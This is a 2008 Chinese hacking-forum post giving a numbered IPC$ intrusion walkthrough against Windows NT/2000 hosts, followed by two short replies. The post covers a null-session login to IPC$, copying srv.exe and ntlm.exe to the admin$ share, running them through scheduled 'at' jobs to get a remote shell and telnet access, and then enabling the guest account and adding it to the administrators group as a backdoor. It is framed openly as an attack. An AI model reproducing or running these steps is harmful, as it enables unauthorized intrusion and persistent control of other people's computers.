找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 827|回复: 2

一份详尽的IPC$入侵资料

[复制链接]

7

主题

6

回帖

17

牛毛

初生牛犊

积分
17
QQ
发表于 2008-10-28 02:12:01 | 显示全部楼层 |阅读模式 来自 江苏省无锡市
原理:
IPC$(Internet Process Connection)是共享\"命名管道\"的资源,它是为了让进程间通信而开放的命名管道,
通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。
IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。
NT/2000在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$……)
和系统目录winnt或windows(admin$)共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
平常所说的ipc$漏洞并不是一个真正意义上的漏洞,一定是指微软自己安置的那个“后门”:空会话(Null session)。

方法:
1. C:\\>net use \\\\127.0.0.1\\IPC$ \"\" /user:\"admintitrators\"
这是用《流光》扫到的用户名是administrators,密码为\"空\"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为\"空\",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。

2. C:\\>copy srv.exe \\\\127.0.0.1\\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\\winnt\\system32\\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

3. C:\\>net time \\\\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

4. C:\\>at \\\\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)

5. C:\\>net time \\\\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。

6. C:\\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

7.C:\\>copy ntlm.exe \\\\127.0.0.1\\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

8. C:\\WINNT\\system32>ntlm
输入ntlm启动(这里的C:\\WINNT\\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现\"DONE\"的时候,就说明已经启动正常。然后使用\"net start telnet\"来开启Telnet服务!

9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组
10. C:\\>net user guest /active:yes
将对方的Guest用户激活

11. C:\\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码

12. C:\\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)

36

主题

271

回帖

108

牛毛

一级牛人

积分
108
发表于 2012-6-13 22:00:59 | 显示全部楼层 来自 安徽省马鞍山市
了解了。。。

72

主题

367

回帖

185

牛毛

一级牛人

积分
185
发表于 2012-6-14 09:02:35 | 显示全部楼层 来自 广东省肇庆市
看不懂的,学习一下。
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-24 22:37 , Processed in 0.145646 second(s), 44 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表